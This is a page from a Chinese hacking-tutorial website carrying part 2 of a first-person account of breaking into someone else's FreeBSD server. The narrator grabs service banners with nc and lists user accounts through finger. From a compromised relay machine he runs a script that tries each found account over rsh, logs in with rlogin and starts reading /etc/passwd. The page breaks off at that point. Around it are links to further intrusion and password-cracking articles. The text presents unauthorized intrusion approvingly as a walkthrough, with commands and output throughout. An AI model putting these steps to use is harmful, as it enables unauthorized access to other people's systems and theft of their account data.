文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术黑客技术我是怎么进入他人计算机的
精品推荐
特别推荐
·简单方法查找黑客老巢
·一次入侵过程的公开分析
·快速利用135端口入侵个人电脑
·基础知识 初级黑客安全技术命令详解
·IPC$入侵的高级手段与方法
·在QQ上与任意陌生人聊天的新绝招
·“黑客”教你如何远程控制计算机
·多种DDoS攻击技术方法
·黑客入侵前的信息收集
·看黑客如何发动对电子邮件系统的攻击
·经典:各个网络端口的入侵方法
·防范黑客 从两大方面阻止域名被劫持
·黑客、红客、蓝客、飞客究竟是什么?
·认清虚虚实实的“ARP攻击”防御方法
·黑客知识 彻底堵死SQL注入工具漏洞
·赛迪网"IT技术百家讲坛"开讲 如何防御黑客?
·黑客如何利用DNS欺骗在局域网中挂马
·Windows黑客编程基础
·黑客很狡猾 如何减轻DDoS攻击危害?
·网络攻击的几种攻击与防御手法大揭秘
热点TOP10
·最详细的黑客入门法则
·“黑客”教你如何远程控制计算机
·我是怎么进入他人计算机的
·黑客技术之知道对方IP入侵别人的电脑
·经典常见计算机密码破解实用手册
·不用任何软件(木马程序)盗取账号密码
·基础知识 初级黑客安全技术命令详解
·从零开始学黑客:网络黑客新手入门指南
·Windows黑客编程基础
·流光5.0使用小窍门
·菜鸟变黑客高手
·Telnet高级入侵攻略及原理
·收费网站破解攻略
·谁能知道微软在你的计算机里隐藏的秘密
·黑客破解电脑密码实用技巧大全!
·迎刃而解——破解密码的常用工具
·经典:各个网络端口的入侵方法
·快速利用135端口入侵个人电脑
·用IE即可轻松远程控制对方电脑
·让对方QQ掉线代码

我是怎么进入他人计算机的

日期:2007年6月9日 作者: 查看:[大字体 中字体 小字体]


  21404
  # program vers proto port service
  100000 2 tcp 111 rpcbind
  100000 2 udp 111 rpcbind
  
  咦,看来没戏唱哦……好在还有那么多服务,待偶慢慢试来……
  看看是什么FTP服务器软件吧,说不定有远程溢出的漏洞呢 # ./nc 111.111.111.111 21
  #
  
  乖乖龙的东,什么输出也没有就关上了,这是如何一回事?
  
  C:\>ftp 111.111.111.111
  Connected to 111.111.111.111.
  Connection closed by remote host.
  
  呵呵,看来过滤掉了嘛……怎么办?看看25端口是运行什么SMTP服务的吧……
  
  # ./nc 111.111.111.111 25
  220 ***-***-***-*** ESMTP Sendmail 8.9.3/8.9.3; Wed, 5 Apr 2000 08:56:59 GMT
  
  Sendmail 8.9.3/8.9.3?好象没有什么致命的漏洞呀……
  
  看看是什么WEB服务器先……
  
  # (echo "head /http/1.0";echo;echo)./nc -w 3 111.111.111.111 80
  
  
  
  
  
  

Method Not Implemented


  head to /http/1.0 not supported.


  Invalid method in request head /http/1.0


  



  Apache/1.3.9 Server at ***-***-***-*** Port 80

  
  
  阿帕奇这个版本的东东至少偶的印象中没有什么“死穴”……
  
  好在开了finger,俺就土土地先把用户列表弄出来吧……
  
  finger O@www.targe.com
  
  [www.targe.com]
  
  root
  aaa
  bbb
  ccc
  ddd
  
  总算有点收获……,那么下一步该做什么呢?既然这台主机开了512、513、514的r系列服务,那就值得尝试一下,说不定哪个偷懒的家伙直接在.rhosts里设了+ username
  
  那我就爽了……
  
  顺手写了个shell script,让它去一个一个地尝试rsh命令,传到肉鸡上
  
  # chmod 700 rsh.sh
  # nohup ./rsh.sh www.targe.com
  
  它会自动地在/etc/passwd和/etc/shadow里加上finger出来的用户名,然后su过去,再对远程目标111.111.111.111执行rsh命令,成功则返回该用户名……然后将备份的passwd和shadow再拷回去……删除临时文件,生成报告文件……(或许是我对.rhosts的理解还有问题,有时我在机里加上+ +但rcp时还会报Permission denied或者connectrefused,所以干脆都su成用户——或许太笨;)我便再去MUD里当我的大虾了……半个小时后回来,登上肉鸡,读取报告文件.rsh.txt
  
  # cat ./.rsh.txt
  ccc
  
  hehe,非常抱歉,看来俺得到一个shell了……
  
  进去看看……
  
  # rlogin -l ccc 111.111.111.111
  
  Last login: Fri Mar 24 19:04:50 from 202.102.2.147
  Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
  The Regents of the University of California. All rights reserved.
  
  FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 1999
  
  You have mail.
  
  呵,原来是FreeBSD 3.2-RELEASE呀,感觉不错,进来了,看看我的权限如何吧……
  
  > id
  id
  uid=1003(ccc) gid=1003(ccc) groups=1003(ccc)
  
  看来能做的事还相当有限噢……再看看系统里有没有别人先……
  
  > w
  w
  9:03PM up 6 days, 2:37, 3 users, load averages: 0.00, 0.01, 0.00
  USER TTY FROM LOGIN@ IDLE WHAT
  ccc p0 **.**.***.*** 6:04PM 2:41 -tcsh (tcsh)
  
  不错,就我自在逍遥……看看passwd吧……
  
  > cat /etc/passwd

上一页 [1] [2] [3] 下一页 




上一篇:一次入侵过程的公开分析

下一篇:木马万能查杀法

我是怎么进入他人计算机的 相关文章:
·6招教你准确揣摩他人心理
·“黑客”教你如何远程控制计算机
·计算机启动更快的十五大绝招
·我是怎么进入他人计算机的
·经典常见计算机密码破解实用手册
·快马加鞭 20秒进入Win XP操作系统
·QQ木马到底怎么做 QQ挂马方法大揭密
·如何以安全模式启动计算机
·[赚钱]教你怎么刷官职
·谁能知道微软在你的计算机里隐藏的秘密
我是怎么进入他人计算机的 相关软件:
·计算机基础知识教程
·Google Earth 动态卫星地图 汉化版 带我们进入间谍时代 能看见你家院子
·高级计算机网络
·深入理解计算机系统电子杂志 PDF
·计算机应用基础(视频)教程(6-10)
·计算机等级考试二级C语言真题
·全国专业技术人员计算机应用能力考试模拟 V2.1
·计算机绘图应用教程——CAXA电子图板XP
·计算机英语词汇大全
·计算机基础知识

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.vipcn.net
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.vipcn.net All Rights Reserved. 鄂ICP备05000083号Powered by:viphot